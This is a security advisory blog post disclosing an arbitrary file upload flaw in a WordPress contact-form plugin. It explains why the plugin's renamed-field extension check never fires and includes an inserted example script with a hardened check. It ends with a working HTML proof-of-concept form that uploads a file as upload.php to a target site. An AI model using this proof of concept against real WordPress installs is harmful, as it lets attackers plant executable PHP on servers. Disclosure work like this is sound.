19 Sep 2016

Arbitrary File Upload Vulnerability in N-Media Website Contact Form with File Upload

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three others shared the same vulnerable code. One of those is N-Media Website Contact Form with File Upload.

In the case of this plugin, we found that a very similar looking vulnerability was already listed for it in our dataset. Our first thought was that we had mistakenly marked that one as fixed when we added it to our data and that it had never actually been fixed, but a closer look showed what had happened. After the previous issue was discovered, the following code was added to block .php (and .exe) files from being uploaded:

/* ========== Invalid File type checking ========== */
// Only the 'Filedata' input is examined; once the form field was renamed
// to 'file' in 1.9 this lookup finds nothing and the check never triggers.
$file_type = wp_check_filetype($_FILES ['Filedata'] ['name'], null );
 
$allowed_types = array('php', 'exe');   // despite the name, this is a denylist
//var_dump($allowed_types);
 
if( in_array($file_type['ext'], $allowed_types) ){
	$response ['status'] = 'error';
	// $file_type is an array here, so this concatenation yields "Array" (the plugin's own code)
	$response ['message'] = __ ( 'File type not valid - '.$file_type, 'nm-filemanager' );
	die ( json_encode($response) );
}
/* ========== Invalid File type checking ========== */

At the time, the file input had to be named “Filedata” for the upload to work, and the code above checks the input with that name for extensions that are not allowed. In version 1.9 the file input was renamed to “file”, but the extension check was not updated to match. It still inspects $_FILES['Filedata'], which the new form never sends, so the check never fires and any file type, including .php, can be uploaded. Even when it did fire, a denylist of two extensions is a weak control; an allowlist of the file types the form actually needs is the usual fix.
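As an added example (not the plugin's code and not from the original post), the broken check is modelled below as a standalone PHP script next to a hardened replacement. It uses a constructed $_FILES array shaped like what the proof-of-concept form sends to version 1.9, substitutes pathinfo() for WordPress's wp_check_filetype() so it runs without WordPress, and the function names, the field name 'file' and the allowlist are illustrative assumptions:

```php
<?php
// Added example; not the plugin's code. Run with: php demo.php

// Constructed sample of $_FILES as sent against version 1.9: the field is
// named 'file' and the client asks for the file to be stored as upload.php.
$sample_files = [
    'file' => [
        'name'     => 'upload.php',
        'type'     => 'application/octet-stream',
        'tmp_name' => '/tmp/phpAbC123',   // constructed; not a real temp file
        'error'    => UPLOAD_ERR_OK,
        'size'     => 31,
    ],
];

// Mirrors the plugin's check: it reads $_FILES['Filedata'], which the 1.9
// form no longer sends, so $name is '' and the denylist never matches.
// pathinfo() stands in for wp_check_filetype() here (assumption).
function vulnerable_extension_check(array $files): bool
{
    $name   = $files['Filedata']['name'] ?? '';
    $ext    = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    $denied = ['php', 'exe'];
    return !in_array($ext, $denied, true);   // true means "allowed"
}

// Hardened version: inspect the field the upload handler actually consumes,
// require the final extension to be on an allowlist, and never reuse the
// client-supplied name (so a 'name=upload.php' POST parameter is irrelevant).
// Returns the server-side filename to store under, or null to reject.
function hardened_extension_check(array $files, string $field, array $allowed): ?string
{
    if (!isset($files[$field]['name'], $files[$field]['error'])) {
        return null;   // field missing: reject rather than silently skip the check
    }
    if ($files[$field]['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = strtolower(pathinfo($files[$field]['name'], PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed, true)) {
        return null;
    }
    // Random basename plus the allowlisted extension: double extensions, path
    // separators and NUL bytes in the original name never reach the disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

$allowed = ['jpg', 'png', 'pdf'];   // illustrative allowlist

printf("old check allows upload.php: %s\n",
    vulnerable_extension_check($sample_files) ? 'yes' : 'no');
printf("hardened check result for upload.php: %s\n",
    hardened_extension_check($sample_files, 'file', $allowed) ?? 'rejected');

$sample_files['file']['name'] = 'resume.pdf';
printf("hardened check stores resume.pdf as: %s\n",
    hardened_extension_check($sample_files, 'file', $allowed) ?? 'rejected');
```

Running it shows the old check letting upload.php through, because it never looks at the field that was actually submitted, while the hardened check rejects it and stores a benign resume.pdf under a random name with the .pdf extension it verified. Reading the field by the same name the upload code uses, and failing closed when that field is absent, is what would have prevented the regression described above.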

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/contact_files/ as upload.php.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Timeline

  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 9/19/2016 – WordPress.org Plugin Directory notified.
  • 9/21/2016 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
